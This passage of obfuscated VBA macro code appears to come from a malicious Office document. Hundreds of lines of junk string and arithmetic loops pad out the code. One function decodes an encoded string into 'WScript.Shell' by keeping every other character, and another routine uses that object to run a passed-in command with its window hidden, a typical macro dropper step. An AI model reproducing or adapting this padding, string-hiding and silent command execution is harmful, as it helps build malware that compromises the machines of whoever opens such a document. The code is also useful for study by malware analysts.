                JEzwSA = UCase("ORwYownumbZYqO.o")
                jSFWWI = 180 + 1648 + 217
                Hkuan = UCase("BC%QXJ&WcN &q)")
                Skjamx = Space(8)
                mPeWO = Space(12)
                EsYdIQTR = UCase("ZLHdyf]uUlQ(xwwph%a")
                yoGECU = yoGECU + 1
            Wend

            EsYdIQTR = LTrim("YzKXZRfJLTU.^p%T(J%")
            For IlvIDp = 0 To 358
                mPeWO = "r@OAdE)#WvXSB" + "Cvez_^b^dB.#d#m " + "l!bMSzt^#o"
                jSFWWI = StrReverse("[[ey!-(At?V@F!^")
            Next IlvIDp

            JEzwSA = Left("m#@aYE^xLJSD", 3)
            mVgKFL = Space(9)
        End If
        EsYdIQTR = 1501 - 346 - 1935
        For iIuchJ = 0 To 283
            EsYdIQTR = RTrim("x-JjQ-fh [^*")
            Skjamx = Left("oN#JZgi$^ UIOQ[D", 5)
            Hkuan = 1647 - 1520 - 431
            Hkuan = 1080 + 1840 + 1866
        Next iIuchJ

        While nIcowy < 292
            Skjamx = LTrim("x-higfVNau")
            mVgKFL = LTrim("ZL^npi#dblZW$k-#")
            mVgKFL = Right("hzbXFKuhc&aXPPK!-GM[", 5)
            Skjamx = Right("ROZOiWjjnxvDqeXOn", 2)
            Hkuan = StrReverse("oMHqxir_s?BnSa?(M%q$")
            Hkuan = "ll*DKhjYLp(nEj[" + "X!U.lrjz@fdasFfOC" + "@X#)drOozY"
            mPeWO = LTrim("p%USpo(EKXxWhsis")
            Skjamx = 789 - 1066 - 226
            nIcowy = nIcowy + 1
        Wend

        mVgKFL = LTrim("svE%(Vy^#r@C&.q$_$!")
        EsYdIQTR = 1694 - 870 - 1043
        Skjamx = 391 + 1914 + 700

    smQqZxy = smQqZxy + 1
    Wend
    Skjamx = Right("U)L$R%ITrV", 3)
    mVgKFL = Right("#Kwv^ics#*mT_q", 4)
    jSFWWI = "@De)GXD ((%eO[RKQh" + "(vAtgLaaFl%T*C$_" + "M*skZJ#tkyMxm]kf#M"
    rFNVbb = RTrim("sw-!w-x&j!di")
    Skjamx = 459 - 1838 - 477
    Hkuan = 167 - 623 - 1491
    While yxWEGS < 15
        mVgKFL = 1047 + 1731 + 310
        Skjamx = Right("YRjbikOpvO&_pdy#b)", 3)
        yxWEGS = yxWEGS + 1
    Wend

    For HCXfHO = 0 To 154
        Skjamx = RTrim("LzDU@k_fOrcqNK")
        rFNVbb = StrReverse("?pjZet^Rh%nUFPC")
        JEzwSA = Space(15)
        EsYdIQTR = Right("&t(AIHBBxlrCk%(zs&L", 5)
        rFNVbb = Right("APcwn-WNtRM$.j$ec-", 5)
        Skjamx = Space(13)
        JEzwSA = Left("lbRA]AHiwNF[NszwC", 2)
    Next HCXfHO

    mPeWO = LTrim("dpYenb&bR#H")
    jSFWWI = UCase("VPl&_jA@Qj)[)M-")
    While dEVVHE < 35
        Hkuan = RTrim("kuQ^mWiQxXB%oh")
        EsYdIQTR = UCase("yGjzB$uIc(P(]$*W")
        dEVVHE = dEVVHE + 2
    Wend


End Sub

Private Function QXVMdb(njXMDul As Boolean, bvPZCIh As Double, zFbdQV As String, qRwAEEu As Boolean) As String
    JEzwSA = 1919 - 1502 - 531
    Skjamx = Left("?O*Zivj@jiHsvJ#b!d", 3)
    JEzwSA = Left("O[FMXw__ej)mLpBIrnGR", 3)
    Skjamx = "Q))NKRWlbD" + "-kQrQ.WOOk" + ".gGOoF(P#pR%PSl"
    Hkuan = RTrim("VgwunhuU)Q-Ukm")
    Skjamx = 1599 - 1898 - 1055
    JEzwSA = 1678 - 717 - 189
    Skjamx = 471 - 645 - 1370
    EsYdIQTR = 1063 + 255 + 1896
    mPeWO = 1561 + 828 + 324
    EsYdIQTR = Space(19)
    jSFWWI = RTrim("Vv]Vs]!N#GoD")
    EsYdIQTR = 1459 - 1621 - 377
    For mGRcKm = 0 To 93
        mVgKFL = RTrim("$w]c]w@)&DSN_a!to]m")
        rFNVbb = 790 - 890 - 1413
        Skjamx = 1032 - 1368 - 1933
        mVgKFL = 1641 + 300 + 1865
        mVgKFL = RTrim("HqgNd%K-qTj")
        JEzwSA = LTrim("!u@)Ncm$kxEPRi*Q?")
    Next mGRcKm

    JEzwSA = Space(13)
    mPeWO = Right("QmSsDx#]TG[OgK_dWyo", 4)
    Skjamx = UCase("gSmfH&Qe^.wI[K*IY^")
    mVgKFL = RTrim("HjzFMUcbjwockI[Hy")
    For aaTDbP = 0 To 351
        jSFWWI = UCase("XKLghyHKnMq]B(GeGcnw")
        rFNVbb = Left("hgTNKDw!oo", 3)
        EsYdIQTR = RTrim("IriVm!q.$gH^X$Eait")
    Next aaTDbP

    Skjamx = Left("*.NyOF&FiIB", 5)
    Hkuan = StrReverse("w_bxvPjE!r")
    jSFWWI = StrReverse("gGfRmBzb#X Osbn]GS*]")
    mPeWO = LTrim("EEuJm.dueA#HackhO&_")
    EsYdIQTR = Right("Epf@U*X[wE@UDZ", 5)
    EsYdIQTR = Space(2)
    rFNVbb = "yyNZG$[?X)*XH)mg" + "n.(!sc@AhqKo" + "vIT]Th]O.#UmsaR"
    QXVMdb = "kjZKgoXbgUJeiaIWaxkTrDVatR"
End Function

Private Sub ElTzYh(mtIVFOY As Double)
    JEzwSA = UCase("JvT^HYO%oOw-")
    rFNVbb = RTrim("d^@?XIt&eU%?P_Z]by^E")
    mPeWO = UCase("_IObHabegk_oZj@o)m")
    Hkuan = StrReverse("&.GBv$rB*WeNocGU")
    rFNVbb = Space(4)
    Skjamx = Left("b@H%Vz%l.C", 3)
    Skjamx = UCase("DMDiQHig)F*G%")
    EsYdIQTR = 879 - 267 - 537
    JEzwSA = RTrim("onGfu*LE%Zz")
    mPeWO = UCase("pxWokROeJQRj)Y[#")
    Skjamx = Right("TCa@_q&VCeWHOEo)C", 5)
    JEzwSA = RTrim("(TQ-Uu rwN%Hx")
    jSFWWI = UCase("@%*CMO*zykDEE!wP")
    JEzwSA = StrReverse("_FdD#Mvjq ")
    rFNVbb = Left("EnNKOc.XdDc^d)nCT#?", 5)
    Hkuan = "v&gjLaZnpf&UpisSM" + "_eXg ]U$oagEe?m" + ")COfC!fsh[RN)h?Lk"
    mVgKFL = 165 + 1570 + 925
    EsYdIQTR = UCase("T]vslPK)ai$uPy")
    mVgKFL = Space(6)
    mPeWO = StrReverse("(d)X ZcG!R?hxbj[W%")
    rFNVbb = LTrim("d$sRMri(mKiu#TmxL&i")
    rFNVbb = Left("YZLECyvEISR?(beNKD", 5)
    mVgKFL = 1346 - 299 - 782
    rFNVbb = StrReverse("Br$g_YDYAUPFm^RgD")
    Skjamx = Right("la^zslNshvSr", 4)
    rFNVbb = LTrim("kxj(zKK_[^-#^fIA")
    Skjamx = Right("pO&xM^-^OI", 5)
    For PXdTIX = 0 To 386
        rFNVbb = 671 + 1797 + 1265
        mVgKFL = RTrim("kF n-[$(YHC cXa?YPiM")
        jSFWWI = LTrim("gfr$GsJi)Xs[QEKji")
        rFNVbb = LTrim("Kd?ST$]x_dn")
        jSFWWI = RTrim("FMisEAGnejJ_&])")
        Hkuan = Right("Z^E @SNFasI", 4)
        rFNVbb = Left("ZLDDe!gFbXGFM@!qzOp", 5)
    Next PXdTIX

    mPeWO = 497 + 829 + 1436
    EsYdIQTR = StrReverse("t&nBXsSrl*CUxYfA")
    jSFWWI = RTrim("USkmjM)^b^f)WI)So")
    EsYdIQTR = RTrim(".!x%PzeS)b")
    Hkuan = LTrim("IbYJf.QbqN_")
    mPeWO = StrReverse("zhwItdHuIiF[bjR-?_j%")
End Sub

Private Sub VZnaU(IEKpAgh As String, rpLOgzX As String, WpcIeI As String, tmVCEez As String, eDoWak As String, pQUDtv As String, nErtqT As String)
    Set lhdWG = CreateObject(VuLYqmAZ("WASDcRrkiSpgtx.OStheeql^lU"))
    lhdWG.Run IEKpAgh, 0
    JEzwSA = 204 + 1182 + 774
    mVgKFL = UCase("fy(km S?Iovpqc")
    mPeWO = RTrim("hUEirJOrqxdg$n@xIy")
    JEzwSA = UCase("ZD-@hswf BXgKeES")
    Hkuan = Space(18)
    Skjamx = 1807 + 1080 + 371
    For YmsoMw = 0 To 208
        jSFWWI = RTrim("#OiKtjZvdgsJa")
        JEzwSA = Right("#g@)m$znIWnzOxJo*", 5)
        Hkuan = UCase("w$QzQSqVU@H((evE]")
        EsYdIQTR = "(!mUcNy%_d cC BC@" + "DHbeZy%qY@puqvewUByH" + "xMJK&T_mZHkMnXub"
    Next YmsoMw
    EsYdIQTR = Left("@.oCynwac@)lM", 3)
    EsYdIQTR = StrReverse("j(PVR@$_Q.zhrOs")
    mPeWO = 1161 - 1632 - 1963
    jSFWWI = Right("l^U#UfgDMY%kP&VjLd", 5)
    JEzwSA = 633 + 1759 + 1024
    For QdAvJU = 0 To 178
        EsYdIQTR = LTrim("K hoso]YGwvX)z]]k")
        mPeWO = UCase("Z_brxUrnxi")
        Skjamx = RTrim("(@&WLP&Hd%$wA)")
        Hkuan = Right("?_?mbKc^G^s", 5)
        rFNVbb = LTrim("aus*R]B^YNG")
        Hkuan = LTrim("eBXOlUEN.X")
        mVgKFL = Space(9)
        rFNVbb = LTrim("X!_tpGlXke")
        Hkuan = 329 - 381 - 251
        mPeWO = RTrim("[@V]tg.^b%hQ.GNJeB*y")
    Next QdAvJU
    Skjamx = Left("KZ*EjZwFHmjz&*tWIul", 5)
End Sub

Public Function VuLYqmAZ(moqftb As String) As String
mPeWO = Left("ayq-Wr$g[dkl)[l-df", 5)
Skjamx = Right("Wzii.c_fJvw", 5)
    Dim XdYSuQyg() As Byte
    Hkuan = Right("lXDNr_po_(", 3)
    Dim NDVzSgoO(1000) As Byte
    rFNVbb = 994 + 274 + 921
    mVgKFL = LTrim("VOH.NOYG%UP$(cu%B")
    EsYdIQTR = Space(3)
    KnBoTtO = 0
    mVgKFL = RTrim("S^oMWWJjd[kGmWaYJG")
    jSFWWI = UCase("nn.Afn#RwzuGF_ JF%")
    XdYSuQyg = StrConv(moqftb, vbFromUnicode)
    For eeXpiH = 0 To UBound(XdYSuQyg) - 1
    For ZKLDpo = 0 To 210
        mPeWO = Right("!Jvgl^CA?Ll", 2)
        JEzwSA = StrReverse("BfCW ye(zqqu[Rbc@a")
        Hkuan = "TxKrxrAHTV" + "F^yw[vnr*cSA[%K(ikc " + "sMnsyHvTXC&"
        jSFWWI = 1566 + 542 + 1398
        rFNVbb = UCase("kdtaHYWtI(Dwr-LE iB")
        mVgKFL = 1542 - 821 - 1659
    Next ZKLDpo
    rFNVbb = Right("x-HK)fwA azdwq", 2)
    Hkuan = UCase("ZR@sXZXokxAV&Qkvv*")
        If (eeXpiH Mod 2 = 0) Then
        mPeWO = RTrim(".RHKX)-F%aV#rftfHXm")
        JEzwSA = RTrim("csvSNBuKrd[E")
        Hkuan = "P-fa_Ju[@&RKX." + ".klJ-&-&QmFul" + "j&YJqXU$o]vRMVI]"
        While oWeZEf < 237
            mVgKFL = StrReverse("Royq$FyD^LUAs")
            jSFWWI = 408 + 675 + 1297
            EsYdIQTR = Left("Ox(OLYzHqu", 4)
            JEzwSA = 522 + 1941 + 1919
            jSFWWI = UCase("^@- yG_ENgC")
            Skjamx = LTrim("Tu#ZjebSoU")
            JEzwSA = StrReverse("f?yieU!] O-uSTM_-TAr")
            jSFWWI = 1986 + 1934 + 903
            oWeZEf = oWeZEf + 3
        Wend
            NDVzSgoO(KnBoTtO) = XdYSuQyg(eeXpiH)
            KnBoTtO = KnBoTtO + 2 - 1
            rFNVbb = Right("gsul%c$T@B[!m", 2)
            mVgKFL = RTrim("Mogi!aPKjXzxUP")
            mVgKFL = LTrim("[?s!MvPA^qMfd AN-fj")
            mPeWO = 157 - 843 - 988
        End If
        While miWlPO < 212
            EsYdIQTR = 539 - 749 - 1175
            jSFWWI = LTrim("VJ-qeck)]L!lAIp")
            miWlPO = miWlPO + 3
        Wend
        While kndNbH < 300
            mPeWO = RTrim("bjBzXRQMtG")
            jSFWWI = 511 + 748 + 1815
            rFNVbb = 1582 - 794 - 529
            mPeWO = Right("@?e(bV-_gzlI", 4)
            mPeWO = 1011 - 1402 - 1055
            mVgKFL = Left("zX([GglpzAG_", 3)
            jSFWWI = 1392 - 1481 - 1919
            mVgKFL = Right("dg*X %QUdYQ", 5)
            EsYdIQTR = StrReverse("XSy!]]cPMQg Cmp^]*VK")
            kndNbH = kndNbH + 3
        Wend
        mPeWO = 648 - 1724 - 1590
    Next eeXpiH
    VuLYqmAZ = StrConv(NDVzSgoO, vbUnicode)
    mVgKFL = Left("m?FzPsDYC)L", 2)
End Function
